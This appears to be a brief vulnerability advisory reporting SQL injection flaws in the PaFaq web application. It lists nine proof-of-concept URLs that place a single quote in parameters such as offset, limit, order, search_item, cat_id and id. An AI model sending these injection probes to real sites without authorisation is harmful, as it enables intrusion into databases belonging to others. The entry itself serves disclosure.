|
PaFaq SQL Injection Vulnerability
No exploit is required. The following proof of concepts are available: http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset=' http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit=' http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order='&limit=10 http://www.example.com/index.php?act=Question&id=1&orderby='&order=DESC&limit=10 http://www.example.com/index.php?act=Answer&cid=1&id=1&offset=' http://www.example.com/index.php?act=Search&code=01&search_item=' http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id=' http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4 http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4 |
|
Privacy Statement |